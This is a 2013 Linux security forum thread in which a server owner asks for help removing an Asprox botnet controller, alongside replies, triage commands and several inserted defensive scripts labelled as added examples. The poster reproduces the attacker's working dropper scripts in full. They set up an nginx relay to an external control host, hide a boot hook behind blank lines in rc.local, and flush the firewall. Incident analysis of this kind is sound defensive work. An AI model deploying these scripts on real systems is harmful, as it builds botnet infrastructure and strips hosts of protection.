LinuxQuestions.org > Forums > Linux - Security
Old 06-17-2013, 06:35 PM   #1
AdamCox9
LQ Newbie
 
Registered: Jun 2013
Posts: 2

Rep: Reputation: Disabled
Remove Asprox Botnet Controller from Linux Server


My Linux Server got hacked and a bot got installed on it. So far, I have removed every nginx process and file from my server and I am blocking all of the ports except 80 and a randomly chosen port for SSH. Is anybody familiar with this and know of other things that I can do to remove this and figure out if it is still running?

Code:
Hello,

An IP hosted on your server, *##.##.###.##*, has been blacklisted by Spamhaus (http://www.spamhaus.org/sbl/query/SBL187854).  Unfortunately, because this is a violation of our AUP, and because the listing is negatively affecting other customers the listing must be immediately removed.

Please ensure that this listing has been removed by *Wednesday, June 19th*.  Failure to remove this listing may result in the suspension of your server.  Please update this ticket as soon as the listing has been removed.

Regards,

Matthew
Rackspace AUP

-------

Ref: SBL187854
##.##.###.##/32 is listed on the Spamhaus Block List - SBL
2013-06-15 20:16:59 GMT | SR32 | rackspace.com
Asprox botnet controller @##.##.###.## [compromised webserver]

The host at this IP address has been compromised by cybercriminals who have installed a malicious nginx-daemon at ##.##.###.##2 on port 8080 TCP. This nginx daemon is acting as malware botnet controller, used to control computers infected with a spambot called "Asprox".

Asprox botnet controller located here:
http://##.##.###.##:8080/index.php?r=gate/getipslist&id=<botid>
http://##.##.###.##:8080/<botid><encrypted-string>

AS number: AS19994
AS name: RACKSPACE - Rackspace Hosting
Hostname: ##.##.###.##.static.cloud-ips.com

To get this issue resolved, the malicious nginx daemon needs to be removed from this host. In addition, further steps need to be taken to secure the system and ensure that it doesn't get compromised again (further instructions below).

Attention: The host at this IP address seems to be compromised/hijacked. Before you ask for removal of this listing, please ensure that:
1) All malicious files/processes have been removed/terminated
2) The password of the responsible user/FTP account has been changed (if you don't do this the issue will likely re-appear)
3) The customer's personal computer has been scanned with up-to-date anti-virus software
4) All system software (IIS, Apache, PHP, Perl etc) is up to date
5) Any installed Content Management Software (CMS, like Wordpress, Joomla, Typo3 etc) as well as all installed 3rd party plugins are up to date

In addition, please ensure that you have secured your SSH access by hardening the SSH daemon and changing the password. A short guide on how to secure SSH can be found here:
http://www.spamhaus.org/faq/section/...0Questions#362

Please consider that if you ignore the steps described above the issue will most likely re-appear and the IP address will get re-listed on Spamhaus SBL! Simply deleting the malicious file / process will *NOT* solve this issue!

Last edited by unSpawn; 06-17-2013 at 07:03 PM. Reason: //Add vBB code tags
 
Old 06-17-2013, 07:35 PM   #2
lleb
Senior Member
 
Registered: Dec 2005
Location: Florida
Distribution: CentOS/Fedora
Posts: 2,469

Rep: Reputation: 440
Typically if your server gets hacked, then get what specific data you need and format and reinstall the OS from scratch, and lock it down with the proper implementation of both IPTables and SELinux along with proper permissions and your sshd.conf to never allow root to log in via ssh. Lock it down as tight as you can.
 
Old 06-17-2013, 07:42 PM   #3
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,998
Blog Entries: 54

Rep: Reputation: 2745
Quote:
Originally Posted by lleb View Post
typically if your server gets hacked, then get what specific data you need and format reinstall the OS from scratch
Typically when a server gets compromised one should first mitigate, then investigate, then reinstall and harden. Mitigation keeps contamination from spreading and investigation shows the point(s) of entry. Without proper investigation the OP learns nothing and the loophole may well be exposed again.
 
Old 06-17-2013, 07:56 PM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,998
Blog Entries: 54

Rep: Reputation: 2745
Quote:
Originally Posted by AdamCox9 View Post
My Linux Server got hacked and a bot got installed on it.
- When did this happen?
- What's the distribution and release version?
- Was system software kept up to date?
- What services are / were exposed?
- What software did you run on your web server and was it kept up to date?


Quote:
Originally Posted by AdamCox9 View Post
So far, I have removed every nginx process and file from my server
Deleting files seems to be a natural reflex for new and seasoned admins alike. Unfortunately this only aids the cracker by covering up and hampering any investigation. Preserving files by creating a backup before deleting them ensures evidence is available should you or somebody else wish to investigate the situation. Without investigation you will remain clueless of how the cracker got in. Should you still have user shell history, login records, system and daemon log files (including archived ones), crontabs and other (recently?) modified files available then I suggest you copy them to another machine and run Logwatch on them. Should you have made a backup of files then I'm always interested.


Quote:
Originally Posted by AdamCox9 View Post
and I am blocking all of the ports accept 80 and a randomly chosen port for SSH. Is anybody familiar with this and know of other things that I can do to remove this and figure out if it is still running?
- While old, please run the commands from the Intruder Detection Checklist (CERT): http://web.archive.org/web/200801092...checklist.html.
- Please adjust commands if necessary and attach as a plain text file (or pastebin) the output of:
Code:
( \ps axfwwwe -opid,ppid,gid,uid,cmd 2>&1; \lsof -Pwln 2>&1; \ls -al /var/spool/cron 2>&1; \netstat -anTpe 2>&1; \lastlog 2>&1; \last -wai 2>&1; \who -a 2>&1 ) | tee /tmp/output.txt
- Please ensure your firewall logs all in and egress new connection requests.
* Depending on your version (see 'man logwatch') Logwatch may be run as:
Code:
logwatch.pl --numeric --detail 5 --service all --range All --archives --print 2>&1 | tee /tmp/logwatch.txt
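As an added example (not unSpawn's commands and not from the thread), the same triage command set run into an evidence directory, one file per command plus a SHA-256 manifest, instead of a single file under the suspect host's own /tmp. The run_capture and collect_volatile names and the OUT variable are this example's own choices:

```shell
#!/bin/sh
# Added example, not part of the thread: runs the triage commands from the
# post above, writing each command's output to its own file in an evidence
# directory with a hash manifest. OUT should point at a mounted USB stick,
# NFS share or similar, never at the compromised machine's own /tmp.

# run_capture OUT NAME CMD...: record the command line, start time, stdout,
# stderr and exit status in OUT/NAME.txt, then hash that file into MANIFEST.
run_capture() {
    out="$1"; name="$2"; shift 2
    f="$out/$name.txt"
    {
        echo "# command: $*"
        echo "# started: $(date -u +%Y-%m-%dT%H:%M:%SZ)"
        if command -v "$1" >/dev/null 2>&1; then
            "$@" 2>&1
            echo "# exit status: $?"
        else
            echo "# $1 not found on this host"
        fi
    } > "$f"
    sha256sum "$f" >> "$out/MANIFEST"
}

# collect_volatile OUT: the command set from the post, one capture each.
# Returns 0 once MANIFEST holds an entry for all seven captures.
collect_volatile() {
    out="$1"
    mkdir -p "$out" || return 1
    run_capture "$out" ps      ps axfwwwe -opid,ppid,gid,uid,cmd
    run_capture "$out" lsof    lsof -Pwln
    run_capture "$out" cron    ls -al /var/spool/cron
    run_capture "$out" netstat netstat -anTpe
    run_capture "$out" lastlog lastlog
    run_capture "$out" last    last -wai
    run_capture "$out" who     who -a
    [ "$(wc -l < "$out/MANIFEST")" -eq 7 ]
}

# Usage: OUT=/mnt/usb/evidence-$(hostname) sh collect_volatile.sh   (as root)
if [ -n "${OUT:-}" ]; then
    collect_volatile "$OUT"
fi
```

Run it as root, since lsof and netstat -p only show other users' processes with privileges. Verifying the manifest later with `sha256sum -c MANIFEST` shows whether the captured files were altered after collection.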
 
Old 06-17-2013, 08:50 PM   #5
AdamCox9
LQ Newbie
 
Registered: Jun 2013
Posts: 2

Original Poster
Rep: Reputation: Disabled
Hackers Commands

The only commands they entered were:
Code:
nginx
cd /usr/local/
bash 20130615_mn.sh
nginx
The 20130615_mn.sh file looks like:

Code:
if which yum >/dev/null; then
    yum -y install gcc make nano
fi

if which aptitude >/dev/null; then
    aptitude update && aptitude -q -y install gcc make nano
fi

cd /opt/ && wget http://nginx.org/download/nginx-1.2.6.tar.gz &&
tar zxf nginx-1.2.6.tar.gz &&
cd nginx-1.2.6 &&
./configure --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid  --http-log-path=/var/log/nginx/error.log --error-log-path=/var/log/nginx/access.log --without-http_rewrite_module --without-http_gzip_module &&
make -j2 &&
make install &&
echo "worker_processes 4;
events {
        worker_connections 10240;
}
http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    sendfile on;
    tcp_nopush on;
    keepalive_timeout 0;
    tcp_nodelay on;
    server {
        listen 8080;
        server_name _;
        location / {
            proxy_pass http://144.76.42.88:8880/;
            proxy_set_header Host \$host;
            proxy_set_header X-Real-IP \$remote_addr;
            proxy_set_header X-Forwarded-For \$remote_addr;
            client_max_body_size    10M;
            client_body_buffer_size 128k;
            proxy_connect_timeout   90;
            proxy_send_timeout      90;
            proxy_read_timeout      90;
            proxy_buffer_size       4k;
            proxy_buffers           4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
        }
    }
}" > /etc/nginx/nginx.conf

if [ -f /etc/rc.local ] ; then
    echo "


































nginx &
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F" > /etc/rc.local
fi
e=$(netstat -napt | grep LISTEN | grep :8080 | awk '{print $7}' | perl -n -e '/([\d\.]+)/ && print "$1"')
test $e && kill -9 $e
/etc/rc.local
There were two other similar files:

20130507.sh
Code:
if which yum >/dev/null; then
    yum -y install gcc make nano
fi

if which aptitude >/dev/null; then
    aptitude update && aptitude -q -y install gcc make nano
fi

cd /opt/ && wget http://nginx.org/download/nginx-1.2.6.tar.gz &&
tar zxf nginx-1.2.6.tar.gz &&
cd nginx-1.2.6 &&
./configure --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid  --http-log-path=/var/log/nginx/error.log --error-log-path=/var/log/nginx/access.log --without-http_rewrite_module --without-http_gzip_module &&
make -j2 &&
make install &&
echo "worker_processes 4;
events {
        worker_connections 10240;
}
http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    sendfile on;
    tcp_nopush on;
    keepalive_timeout 0;
    tcp_nodelay on;
    server {
        listen 8080;
        server_name _;
        location / {
            proxy_pass http://144.76.42.72:8880/;
            proxy_set_header Host \$host;
            proxy_set_header X-Real-IP \$remote_addr;
            proxy_set_header X-Forwarded-For \$remote_addr;
            client_max_body_size    10M;
            client_body_buffer_size 128k;
            proxy_connect_timeout   90;
            proxy_send_timeout      90;
            proxy_read_timeout      90;
            proxy_buffer_size       4k;
            proxy_buffers           4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
        }
    }
}" > /etc/nginx/nginx.conf

if [ -f /etc/rc.local ] ; then
    echo "


































nginx &
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F" > /etc/rc.local
fi
e=$(netstat -napt | grep LISTEN | grep :8080 | awk '{print $7}' | perl -n -e '/([\d\.]+)/ && print "$1"')
test $e && kill -9 $e
/etc/rc.local
And, 20130615_mn_change_cfg.sh

Code:
echo "worker_processes 4;
events {
        worker_connections 10240;
}
http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    sendfile on;
    tcp_nopush on;
    keepalive_timeout 0;
    tcp_nodelay on;
    server {
        listen 8080;
        server_name _;
        location / {
            proxy_pass http://144.76.42.88:8880/;
            proxy_set_header Host \$host;
            proxy_set_header X-Real-IP \$remote_addr;
            proxy_set_header X-Forwarded-For \$remote_addr;
            client_max_body_size    10M;
            client_body_buffer_size 128k;
            proxy_connect_timeout   90;
            proxy_send_timeout      90;
            proxy_read_timeout      90;
            proxy_buffer_size       4k;
            proxy_buffers           4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
        }
    }
}" > /etc/nginx/nginx.conf && killall nginx && nginx
But, the email message says that the hacker can remotely log in through nginx, so they could have executed any commands forward.
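Added example, not from the thread and not the poster's code: a read-only check for the traces the posted dropper leaves behind, namely the rc.local hook hidden behind the run of blank lines, the nginx.conf relay from port 8080 to an upstream on 8880, the build tree left in /opt, and a live listener on 8080. The function names and the RC_LOCAL, NGINX_CONF and BUILD_DIR variables are this example's own choices:

```shell
#!/bin/sh
# Added example, not part of the thread: looks for what 20130615_mn.sh leaves
# behind. Paths default to the live system but can be pointed at a mounted
# image or a copied evidence tree, e.g. RC_LOCAL=/mnt/img/etc/rc.local.
RC_LOCAL="${RC_LOCAL:-/etc/rc.local}"
NGINX_CONF="${NGINX_CONF:-/etc/nginx/nginx.conf}"
BUILD_DIR="${BUILD_DIR:-/opt/nginx-1.2.6}"

# rc.local: the dropper overwrites it with "nginx &" plus iptables ACCEPT
# policies and a flush, preceded by dozens of blank lines so that a quick
# 'cat' shows an apparently empty file. Returns 0 when a marker is found.
rc_local_suspicious() {
    f="$1"
    [ -f "$f" ] || return 1
    grep -qE '^[[:space:]]*nginx[[:space:]]*&[[:space:]]*$' "$f" && return 0
    grep -qE '^[[:space:]]*iptables[[:space:]]+-F[[:space:]]*$' "$f" && return 0
    grep -qE '^[[:space:]]*iptables[[:space:]]+-P[[:space:]]+(INPUT|OUTPUT|FORWARD)[[:space:]]+ACCEPT' "$f" && return 0
    return 1
}

# Number of blank lines immediately before the first "nginx &" line (the
# padding itself); prints 0 when there is no such line.
rc_local_padding_lines() {
    awk 'BEGIN { n = 0 }
         /^[ \t]*$/ { n++; next }
         /^[ \t]*nginx[ \t]*&/ { print n; found = 1; exit }
         { n = 0 }
         END { if (!found) print 0 }' "$1"
}

# The proxy_pass target, useful for blocking at the firewall and for the report.
nginx_conf_upstream() {
    grep -oE 'proxy_pass[[:space:]]+https?://[^;]+' "$1" 2>/dev/null \
        | head -n 1 | sed 's/^proxy_pass[[:space:]]*//'
}

# nginx.conf: a bare reverse proxy listening on 8080 and forwarding to an
# upstream on port 8880. Returns 0 when both are present.
nginx_conf_is_relay() {
    f="$1"
    [ -f "$f" ] || return 1
    grep -qE '^[[:space:]]*listen[[:space:]]+8080;' "$f" || return 1
    nginx_conf_upstream "$f" | grep -q ':8880'
}

# Unpacked source tree or tarball left in /opt by the build step.
build_dir_present() {
    [ -d "$1" ] || [ -f "$1.tar.gz" ]
}

# Live check, only meaningful on the running host: anything bound to tcp/8080.
listener_on_8080() {
    if command -v ss >/dev/null 2>&1; then
        ss -ltn 2>/dev/null | grep -qE ':8080[[:space:]]'
    else
        netstat -lnt 2>/dev/null | grep -qE ':8080[[:space:]]'
    fi
}

# Run every check; exit status 0 means nothing was found.
scan_host() {
    hits=0
    if rc_local_suspicious "$RC_LOCAL"; then
        echo "rc.local: boot hook found after $(rc_local_padding_lines "$RC_LOCAL") blank lines"
        hits=$((hits + 1))
    fi
    if nginx_conf_is_relay "$NGINX_CONF"; then
        echo "nginx.conf: relay on 8080 to $(nginx_conf_upstream "$NGINX_CONF")"
        hits=$((hits + 1))
    fi
    if build_dir_present "$BUILD_DIR"; then
        echo "build tree: $BUILD_DIR (or its tarball) present"
        hits=$((hits + 1))
    fi
    if listener_on_8080; then
        echo "network: a listener is bound to tcp/8080"
        hits=$((hits + 1))
    fi
    [ "$hits" -eq 0 ]
}

# Usage: sh check_relay_traces.sh --scan
case "${1:-}" in --scan) scan_host ;; esac
```

A clean result from this only says the specific traces of this dropper are gone; it says nothing about how the attacker got a shell in the first place, which is the question unSpawn's list is after.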
 
Old 06-18-2013, 01:29 AM   #6
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,998
Blog Entries: 54

Rep: Reputation: 2745
Quote:
Originally Posted by AdamCox9 View Post
The only commands they entered were
Thanks for posting those. That answers about one tenth of what I asked BTW.


Quote:
Originally Posted by AdamCox9 View Post
But, the email message says that the hacker can remotely log-in through nginx, so they could have executed any commands forward.
Sure but the only thing I'm seeing is Nginx being set up as a proxy at some Hetzner address.
 
Old 07-11-2013, 02:42 PM   #7
rebus
LQ Newbie
 
Registered: Mar 2008
Posts: 1

Rep: Reputation: 0
Hello Adam,
thank you for sharing the snippets of the code executed by the hackers to install the nginx proxy.


Based on the scripts:
1) remove the nginx from /etc/rc.local to prevent restart of it with next reboot
2) backup+remove /opt/nginx-1.2.6.tar.gz /opt/nginx-1.2.6
3) backup+remove /usr/sbin/nginx /etc/nginx/nginx.conf /var/run/nginx.pid /var/log/nginx/error.log /var/log/nginx/access.log /etc/nginx


I believe crucial points to prevent re-infection in your case:
1) change root password
2) check thoroughly the machines where the root password was used - there is a high chance that a keylogger is installed there

I would be happy if you can share any other info/logs regarding Asprox on email <rebus (at) seznam.cz>

Best regards
Michal Ambroz

---------- Post added 07-11-13 at 02:43 PM ----------

More information on Asprox botnet:
http://rebsnippets.blogspot.com/asprox
http://www.trendmicro.com/cloud-cont...rox-reborn.pdf
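Added example combining unSpawn's point above (copy before deleting, or the evidence is gone) with rebus's removal list; it is not code from either poster. The evidence directory layout, the MANIFEST file, the function names and the EVIDENCE/ROOT variables are this example's own choices; the path list is the one rebus gives, and the rc.local filter matches the lines the posted dropper writes:

```shell
#!/bin/sh
# Added example, not part of the thread: "backup first, then remove" for the
# paths listed in the post above. Nothing is removed until a copy and its
# SHA-256 are in the evidence directory. ROOT lets the same routine run
# against a mounted image (e.g. ROOT=/mnt/img) instead of the live system.

# preserve_then_remove EVIDENCE PATH: copy PATH (file or directory) into
# EVIDENCE mirroring its absolute path, append hashes to MANIFEST, then delete
# the original. Returns 1 if PATH is absent, 2 if the copy failed (original kept).
preserve_then_remove() {
    evidence="$1"; target="$2"
    [ -e "$target" ] || return 1
    dest="$evidence$target"
    mkdir -p "$(dirname "$dest")" || return 2
    cp -a "$target" "$dest" || return 2
    if [ -d "$target" ]; then
        find "$target" -type f -exec sha256sum {} + >> "$evidence/MANIFEST"
    else
        sha256sum "$target" >> "$evidence/MANIFEST"
    fi
    rm -rf "$target"
}

# strip_rc_local_hook EVIDENCE RC: keep an untouched, hashed copy of rc.local,
# then drop the "nginx &" line and the iptables policy/flush lines the dropper
# wrote and collapse its run of padding blank lines to a single one.
strip_rc_local_hook() {
    evidence="$1"; rc="$2"
    [ -f "$rc" ] || return 1
    mkdir -p "$evidence" && cp -a "$rc" "$evidence/rc.local.orig" || return 2
    sha256sum "$evidence/rc.local.orig" >> "$evidence/MANIFEST"
    awk '/^[ \t]*nginx[ \t]*&[ \t]*$/ { next }
         /^[ \t]*iptables[ \t]+-P[ \t]+(INPUT|OUTPUT|FORWARD)[ \t]+ACCEPT[ \t]*$/ { next }
         /^[ \t]*iptables[ \t]+-F[ \t]*$/ { next }
         /^[ \t]*$/ { if (blank) next; blank = 1; print; next }
         { blank = 0; print }' "$evidence/rc.local.orig" > "$rc"
}

# cleanup_listed_artifacts EVIDENCE [ROOT]: the thread's list, in order.
# Stop the nginx process first; this handles files only. Returns 0 once a
# manifest exists, i.e. at least one artifact was preserved.
cleanup_listed_artifacts() {
    evidence="$1"; root="${2:-}"
    mkdir -p "$evidence" || return 2
    strip_rc_local_hook "$evidence" "$root/etc/rc.local" || echo "no $root/etc/rc.local to clean"
    for p in /opt/nginx-1.2.6.tar.gz /opt/nginx-1.2.6 /usr/sbin/nginx \
             /etc/nginx/nginx.conf /var/run/nginx.pid \
             /var/log/nginx/error.log /var/log/nginx/access.log /etc/nginx; do
        if preserve_then_remove "$evidence" "$root$p"; then
            echo "preserved and removed $root$p"
        fi
    done
    [ -f "$evidence/MANIFEST" ]
}

# Usage: EVIDENCE=/mnt/usb/evidence ROOT= sh cleanup_listed.sh   (as root)
if [ -n "${EVIDENCE:-}" ]; then
    cleanup_listed_artifacts "$EVIDENCE" "${ROOT:-}"
fi
```

Keep the evidence directory off the compromised disk. Note that the dropper's `iptables -F` lines are removed from rc.local but the running firewall is not touched; reload the intended ruleset separately.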
 
  

